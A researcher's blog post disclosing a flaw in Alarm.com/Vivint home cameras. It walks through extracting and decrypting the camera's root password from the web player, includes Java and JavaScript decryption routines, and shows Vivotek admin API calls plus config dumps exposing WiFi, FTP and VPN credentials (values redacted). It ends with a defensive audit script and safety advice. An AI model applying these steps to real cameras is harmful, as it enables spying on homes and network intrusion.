Alarm.com Camera Vulnerability
Alarm.com uses a Java web player to live-stream video from your home security cameras to your browser; the Java player source code is easily decompiled and can grant an attacker access to the camera and home network.
I've been a user of Vivint for about 4 years. 3 years ago I discovered a small vulnerability in their camera system and reported it to both Alarm.com and Vivint. The issue still lives on to date; this post will demonstrate how to gain access to your camera's Web UI and in turn expose some security holes over your home network.
Alarm.com acts as mediator between hardware manufacturers and dealers (such as Vivint, Frontpoint Security and many others).
TL;DR
Alarm.com uses a Java web player to live-stream video from your home security cameras to your browser; the Java player source code is easily decompiled and can grant an attacker access to the following:
- Alarm.com's master encryption key
- Your camera's encrypted password
- The algorithm to decrypt the password (using the master key)
- Your external IP & camera ports (the camera automatically enables UPnP port forwarding)
- Camera MAC address
Which, in turn, will gain the attacker the following through the camera's own security flaws:
- Full access & control of your camera
- Your home network information
- IEEE 802.1x information (including CA certificate)
- WiFi information (including network keys)
This means:
- Attacker can access your WiFi network
- Attacker can fully view all camera streams
- Attacker can fully control the camera settings
  - automatically record and upload videos to their own FTP servers
  - modify all settings, and lock you out
  - update camera firmware! (extremely dangerous)
- Attacker has access to Vivint FTP servers
- Attacker has access to Vivint VPN servers
and more …
Caveats
As with all such vulnerabilities, this doesn't necessarily mean you're being watched by a hacker right now! It does however create reasonable risk of an attack vector which is neither too complicated, nor too farfetched:
- The attacker needs to gain access to your browser or your alarm.com browser session
  - Easily done through a malicious browser extension, or spyware on your computer to hijack your session
  - Are you using an easy-to-guess password for your Alarm.com/Vivint account?
  - Is your e-mail account secured? (the "forgot password" feature is the easiest attack vector if your email is insecure)
- The attacker needs to gain access to your WiFi or local network
  - Consumer WiFi routers are notoriously easy to hack
  - How many house guests did you give your WiFi password to? Are their devices safe from leaking that password?
You don't have to be paranoid to worry about security; it is a reality of the modern age!
Official Response
Upon initial contact, neither company's representatives were interested in discussing further, and only told me they'd log my report and let the tech team know, so I took to Twitter, and posted in /r/homedefense on reddit, which caught Vivint's attention.
They immediately contacted me and put me in touch with Vivint's VP of Innovation; we had a productive chat and he explained that Vivint's focus was to move into the Vivint Sky system and away from the Alarm.com system. Fast forward 3 years later: while Vivint has indeed stopped selling the old system to new customers, they are still operating the Alarm.com system for old customers. Myself included.
Some noteworthy events over the past 3 years that relate to this issue:
- In September 2015, Google announced they were dropping support for Java with Chrome v45
  - upon this announcement Alarm.com worked to update their video player to a Flash player instead of the Java one
  - currently the Java player is still accessible, allowing for the vulnerability described here
  - the Flash system is not perfect, and I have found some issues with it too (see below)
- As of December 2016, Chrome v55 now blocks Flash by default
  - There is no info yet from Alarm.com on what they will replace the video player with
- Vivint started shipping cameras with a firmware that strips out the Web UI completely, and executes a daily remote reset for camera settings and keys.
  - Though those will do nothing to protect you from the Alarm.com vulnerability, or the camera's own weak security once accessed.
- There have been MANY vulnerabilities exposed in Vivotek cameras including:
  - execute arbitrary code
  - access the video stream via RTSP
  - dump the camera's memory and retrieve user credentials
The Details
Here are the steps to follow which will give you access to the camera system:
1. Login to your Alarm.com web portal
2. Go to the Live Video page https://www.alarm.com/web/Video/LiveView.aspx
   - You might get redirected to https://www.alarm.com/web/Video/LiveViewFlash.aspx. This is a soft redirect to the new Flash player if Alarm.com detects your browser supports it.
   - Stay on the LiveView.aspx page if you can, or just manually view source in step 3.
3. View the page source: view-source:https://www.alarm.com/web/Video/LiveView.aspx
4. You will find the following `<applet>` code, repeated for as many cameras as you have on the system:
```html
<applet type="application/x-java-applet" class="live_viewer_object" CODE="VideoViewer.class" ARCHIVE="LiveViewer082.jar" NAME="LiveViewer_ctl00_phBody_ctl08" ID="LiveViewer_ctl00_phBody_ctl08" WIDTH="1280" HEIGHT="800" MAYSCRIPT="true" scriptable="true" pluginspage="http://java.sun.com/products/plugin/index.html#download">
  <param name="permissions" value="all-permissions" />
  <param name="addr" value="[redacted]" />
  <param name="alt_addr" value="[redacted]" />
  <param name="query" value="/nphMotionJpeg?Resolution=1280x800&Quality=5" />
  <param name="login" value="root" />
  <param name="pwd" value="[redacted]" />
  <param name="mac" value="[redacted]" />
  <param name="resolution" value="1280x800" />
  <param name="make" value="Alarm.com" />
  <param name="model" value="ADC-V620PT" />
  <param name="prefer_alt_ip" value="true" />
  <param name="pantilt" value="true" />
  <param name="vmd_mode" value="false" />
  <param name="protected_mode" value="false" />
  <param name="vpnproxyserver" value="https://www.alarm.com/web/" />
  <param name="usevpn" value="false" />
  <param name="SessionId" value="[redacted]" />
  <param name="border" value="false" />
  <param name="language" value="1" />
  <param name="applet_id" value="LiveViewer_ctl00_phBody_ctl08" />
  <param name="channel" value="0" />
  <param name="in_privacy_mode" value="false" />
  <param name="deviceId" value="2049" />
</applet>
```
5. For each camera listed, copy the values for the following params: (addr, alt_addr, login, pwd, mac). Here's what they mean:

Param | Description
---|---
addr | Public IP and port
alt_addr | Local IP and port
login | Login/username, always root
pwd | Encrypted password
mac | MAC address
Decrypting the Password
The video player and the decryption logic are included in LiveViewer082.jar (which you can download without even having to be logged in).
The .jar file can easily be decompiled into human-readable code using JD GUI.
Once decompiled, and upon some inspection of the source code, I found the following method under ConnectionThread.class:
```java
private String Deobfuscate(String Pwd) {
    String key = "[redacted]";
    String unXorBuf = "";
    String unHexBuf = "";
    try {
        // XOR each hex digit of the obfuscated password with the matching digit of the key
        for (int Ind = 0; Ind < Pwd.length(); Ind++) {
            unXorBuf = unXorBuf + Integer.toHexString(Integer.parseInt(Pwd.substring(Ind, Ind + 1), 16) ^ Integer.parseInt(key.substring(Ind, Ind + 1), 16));
        }
        // Decode the resulting hex string two digits at a time into characters
        for (int Ind = 0; Ind < unXorBuf.length(); Ind += 2) {
            unHexBuf = unHexBuf + (char) Integer.parseInt(unXorBuf.substring(Ind, Ind + 2), 16);
        }
        return unHexBuf;
    } catch (Exception ex) {
        DbgMsg("(e4) " + ex.getMessage());
    }
    return Pwd;
}
```
Note:
- The key value here is the global Alarm.com Master Key; I have redacted the value so you can go get it yourself if you follow the instructions in this post.
- I am not fully certain this will be the same value for all Alarm.com users, but so far I have verified with another friend who is also a Vivint user and it is indeed the same.
This will allow you to "decrypt" the pwd field from earlier:
`<param name="pwd" value="[redacted]" />`
For expediency, here's a JavaScript version of this function that you can run in your browser right now:
```javascript
const key = '[redacted]'

function deobfuscate (Pwd) {
  let unXorBuf = ''
  let unHexBuf = ''
  // XOR each hex digit of the obfuscated password with the matching digit of the key
  // (toString(16) keeps the result as a hex digit, matching the Java Integer.toHexString)
  for (let Ind = 0; Ind < Pwd.length; Ind++) {
    unXorBuf = unXorBuf + Number(parseInt(Pwd.substring(Ind, Ind + 1), 16) ^ parseInt(key.substring(Ind, Ind + 1), 16)).toString(16)
  }
  // Decode the resulting hex string two digits at a time into characters
  for (let Ind = 0; Ind < unXorBuf.length; Ind += 2) {
    unHexBuf = unHexBuf + String.fromCharCode(parseInt(unXorBuf.substring(Ind, Ind + 2), 16))
  }
  return unHexBuf
}
```
With the username root and the password decrypted, you can now access your camera's web interface and configuration using the IP address and port information obtained earlier:
Vivint started shipping cameras with the web UI stripped out; still, this does nothing to remove the admin API, which is documented in detail in your camera's manual. Here's an example from the Vivotek PT8133:
Accessing your Camera
My cameras, and (from what I can tell) all the Alarm.com / Vivint cameras are manufactured by Vivotek.
- You can read the Vivotek admin API values using:
  `GET http://[user]:[pwd]@[ip]:[port]/cgi-bin/admin/getparam.cgi`
- You can write Vivotek admin API values using:
  `POST http://[user]:[pwd]@[ip]:[port]/cgi-bin/admin/setparam.cgi?[key]=[value]`
- Consult your camera manual for variations and key/value mappings
- iSpy did an amazing job of indexing all the video streaming URLs across all Vivotek cameras by model
Whether you have access to the web UI, or you go by the HTTP API, you now have access to view the entire system's parameters stored on the camera. This is where the vulnerability finally takes shape: these parameters include everything from your camera's settings, to the WiFi network keys and more!
Here are a few highlights that I found to be most interesting (with values redacted):
Your Camera's Users & Settings
All the camera's configurations are laid bare, and are easily modifiable with a simple POST request. This includes all the Video Streams, Motion Detection, Recording Schedules, FTP upload targets, even Firmware Updates, which allows an attacker to completely replace your camera's firmware, leaving both you and Alarm.com none the wiser!
```
system_hostname='Wireless Mega-Pixel Network Camera'
system_ntp='ntp.alarm.com'
system_dailyreboot='07:00'
system_info_modelname='PT8133W'
system_info_extendedmodelname='ADC-V620PT'
system_info_serialnumber='[redacted]'
system_info_firmwareversion='PT8133-ALAM-0102c1'
security_user_i0_name='root'
security_user_i0_pass='[redacted]'
security_user_i0_privilege='admin'
network_http_alternateport='40926'
network_http_authmode='digest'
```
An interesting and also scary discovery:
Your camera exposes a live audio stream, one which Alarm.com & Vivint do not offer you access to, but an attacker can listen to everything going on in your home!
```
network_rtsp_s0_audiotrack='-1'
network_rtsp_s0_multicast_alwaysmulticast='0'
network_rtsp_s0_multicast_videoport='5560'
network_rtsp_s0_multicast_audioport='5562'
network_rtsp_s0_multicast_ipaddress='[redacted]'
network_rtsp_s0_multicast_ttl='15'
```
Your Home Network
Your WiFi keys are stored in plain text (redacted below)!
```
network_ieee8021x_enable='0'
network_ieee8021x_eapmethod='eap-peap'
network_ieee8021x_identity_peap=''
network_ieee8021x_identity_tls=''
network_ieee8021x_password=''
network_ieee8021x_privatekeypassword=''
network_ieee8021x_ca_exist='0'
network_ieee8021x_ca_time='0'
network_ieee8021x_ca_size='0'
network_ieee8021x_certificate_exist='0'
network_ieee8021x_certificate_time='0'
network_ieee8021x_certificate_size='0'
network_ieee8021x_privatekey_exist='0'
network_ieee8021x_privatekey_time='0'
network_ieee8021x_privatekey_size='0'
wireless_ssid='[redacted]'
wireless_wlmode='Infra'
wireless_channel='6'
wireless_txrate='0'
wireless_encrypt='3'
wireless_authmode='OPEN'
wireless_keylength='64'
wireless_keyformat='HEX'
wireless_keyselect='1'
wireless_key1='[redacted]'
wireless_key2='[redacted]'
wireless_key3='[redacted]'
wireless_key4='[redacted]'
wireless_domain='0'
wireless_algorithm='AES'
wireless_presharedkey='[redacted]'
wireless_connecttype='manual'
```
Alarm.com VPN
Dump the certificates and connect to their VPN!
```
vpn_protocol='udp'
vpn_host='videovpn.alarm.com'
vpn_port='1294'
vpn_devtype='tun'
vpn_encryption='AES-256-CBC'
```
Alarm.com DDNS Login
I'm sure with enough research some DDNS server vulnerabilities can be discovered here; oh, and look, they gave us credentials! In plain text!
```
ddns_Alarm_hostname='www.alarm.com'
ddns_Alarm_usernameemail=''
ddns_Alarm_passwordkey='[redacted]'
ddns_Alarm_servername='deviceapi.alarm.com'
ddns_Alarm_updateinterval='3600'
```
Alarm.com FTP upload servers
Another potential for researching FTP vulnerabilities; they were kind enough to provide credentials here as well. In plain text!
```
server_i0_name='alarm_ftp'
server_i0_type='ftp'
server_i0_http_url='http://'
server_i0_http_username=''
server_i0_http_passwd=''
server_i0_ftp_address='[redacted]'
server_i0_ftp_username='[redacted]'
server_i0_ftp_passwd='[redacted]'
server_i0_ftp_port='21'
```
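If you want to check your own camera for the exposures listed above, the following Node.js script (an added example, not code from the original post or from Vivotek/Alarm.com) parses a getparam.cgi dump in the key='value' format shown and reports plaintext credentials, non-digest HTTP auth, and vendor FTP/DDNS endpoints whose credentials sit in the config; the sample dump, its hostnames and its credentials are constructed placeholders.

```javascript
// Added example (not from the original post): audit a Vivotek getparam.cgi dump
// for the exposures walked through above. The input is the camera's own
// key='value' line format. SAMPLE_DUMP is constructed; every hostname and
// credential in it is a placeholder.
const SAMPLE_DUMP = `
system_info_modelname='PT8133W'
security_user_i0_name='root'
security_user_i0_pass='example-root-pass'
network_http_authmode='basic'
wireless_ssid='example-ssid'
wireless_key1=''
wireless_presharedkey='example-psk'
ddns_Alarm_servername='ddns.example.invalid'
ddns_Alarm_passwordkey='example-ddns-key'
server_i0_ftp_address='ftp.example.invalid'
server_i0_ftp_username='example-ftp-user'
server_i0_ftp_passwd='example-ftp-pass'
`

// Parse "key='value'" lines into a plain object; tolerates spaces around "=".
function parseParams (text) {
  const params = {}
  const line = /^\s*([A-Za-z0-9_]+)\s*=\s*'([^']*)'\s*$/
  for (const raw of text.split('\n')) {
    const m = line.exec(raw)
    if (m) params[m[1]] = m[2]
  }
  return params
}

// Parameter names that hold credentials the camera keeps in clear text.
const SECRET_KEY = /(_pass|_passwd|_password|presharedkey|passwordkey|_key[1-4])$/i

// Report exposures by parameter name only, never echoing the secret values.
function auditParams (params) {
  const findings = []
  for (const [key, value] of Object.entries(params)) {
    if (SECRET_KEY.test(key) && value !== '') {
      findings.push({ key, reason: 'plaintext-secret', severity: 'high' })
    }
  }
  // Basic auth would send the root password in the clear on the LAN.
  if (params.network_http_authmode && params.network_http_authmode !== 'digest') {
    findings.push({ key: 'network_http_authmode', reason: 'weak-http-auth', severity: 'medium' })
  }
  // Vendor FTP/DDNS endpoints whose stored credentials travel with the config.
  const pairs = [['server_i0_ftp_address', 'server_i0_ftp_passwd'], ['ddns_Alarm_servername', 'ddns_Alarm_passwordkey']]
  for (const [hostKey, secretKey] of pairs) {
    if (params[hostKey] && params[secretKey]) {
      findings.push({ key: hostKey, reason: 'vendor-endpoint-with-stored-creds', severity: 'medium' })
    }
  }
  return findings
}

function countByReason (findings, reason) {
  return findings.filter(f => f.reason === reason).length
}
```

Run it against the text returned by getparam.cgi instead of SAMPLE_DUMP to get a report that names the leaking parameters without writing the secrets themselves anywhere.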
Bonus: Flash Histrion Vulnerability
Since Alarm.com switched to a Flash Player (though keeping the Java Player accessible) they employed a more complex encryption mechanism, one that I enjoyed cracking too!
Here's the breakdown:
- The Flash version of the player is served from: https://www.alarm.com/web/Video/LiveViewFlash.aspx
- The page will load the Flash objects, and go on to make a call to get some encrypted content from: https://www.alarm.com/web/Video/LiveViewFlash.aspx/GetProxyMjpegStreamUrl with a JSON request payload: `{ 'camId': 'xxxx' }`
  - Note: up to this point everything is secured behind HTTPS and the user Web Session (in cookies)
- The response is a JSON object with encrypted content: `{"d": "[encrypted]"}`
So what's behind this mysterious request? Let's find out!
1. Just as before, let's grab the video player source code from: https://www.alarm.com/web/Video/AdcSharedUserControls/Video/LocomoteLiveViewer/LocoLivePlayerFlex.swf
2. This time we'll use JPEXS Free Flash Decompiler
3. Upon inspecting the source, I found the decryption logic under scripts/com/axis/http/url.as:
```actionscript
public static function parse_enc(param1:String):Object {
    Logger.log("url enc =" + param1, LogEventLevel.DEBUG);
    // AES-CBC with PKCS5 padding; key and IV are hard-coded constants in the SWF
    var _loc2_:CBCMode = new CBCMode(new AESKey(Hex.toArray("[redacted]")), new PKCS5());
    _loc2_.IV = Hex.toArray("[redacted]");
    var _loc3_:ByteArray = new ByteArray();
    _loc3_.writeBytes(Base64.decode(param1));
    _loc2_.decrypt(_loc3_);
    Logger.log("url dec =" + _loc3_.toString(), LogEventLevel.DEBUG);
    return parse(_loc3_.toString());
}
```
Key & IV values [redacted].
The encryption method here is more sophisticated than the Java method; it is using AES-128-CBC (Cipher Block Chaining) encryption with the AS3 Crypto Framework. The encrypted JSON response from earlier, `{"d": "[encrypted]"}`, is actually base64-encoded binary which, given the Encryption Key (key) and Initialization Vector (IV) exposed above, you can decipher easily.
However, this encryption is ultimately pointless! Upon decrypting the values, I found it merely exposes the video relay server with a token:
https://relayvideo.alarm.com/ProxyLiveVideoWeb.ashx?token=[redacted]
This is pointless because I can see that in my browser's web inspector already:
I'm not sure what their motivation was to encrypt the full URL here with the token, but since both API calls are protected behind HTTPS and web sessions this really does nothing to enhance security.
Flash Relay Server Attack Vector:
In spite of the complex and ultimately pointless encryption, the Flash player method that Alarm.com now uses is much more secure than the prior Java method; though, with the Java player still accessible, the vulnerability remains.
The Flash relay server still exposes a possible attack vector, one that's "simpler" to pull off than the Java Player method described above.
Mainly relying on Session Hijacking (which is also a requirement for pulling off the Java attack vector described above), an attacker can simply use the Alarm.com proxies to directly access and control the camera:
```
// Video Proxy
https://relayvideo.alarm.com/ProxyLiveVideoWeb.ashx
// Control Proxy
https://www.alarm.com/web/Video/ProxyCamControl.ashx
```
An attacker can access the camera stream so long as they can fake your session, and they can send a command to the camera using the control proxy, create a new user with admin privileges and skip all the rest of having to decompile Jar files and decrypt passwords!
Though this is untested, as I've already uncovered enough headaches for one day, let's hope the control proxy actually filters commands before passing them on to the camera!
I described this as "simple" as in needing fewer steps. However, session hijacking is not an easy task to pull off and requires more social engineering skills than technical skills to fool the victim into installing / loading the tools a hacker needs to gain access.
Don't Panic
How to stay safe:
- Secure your email account with Multi-factor Authentication
  - All the security precautions will do you no good if somebody gains access to your email and employs a "forgot password" attack
- Research and thoroughly secure your home router
  - Block all external access
  - Apply strong WiFi security
  - Disable UPnP
- Research and thoroughly secure your IP Cameras
  - Set up Google Alerts for your Camera's model
  - Demand that your security provider (Alarm.com or any other) update their Camera's firmware if you don't have access
- Don't use IP Cameras
  - This should be obvious: if you really want to be safe, don't expose yourself!
- Don't use Alarm.com or any of its vendors
  - Another obvious one!
  - If after 3 years they still have not fixed this issue, I have zero hope they ever will, so this blog post is my final attempt to gain their attention for the benefit of all their customers!
Source: https://ahmadnassri.com/blog/alarm-com-camera-vulnerability-exposed/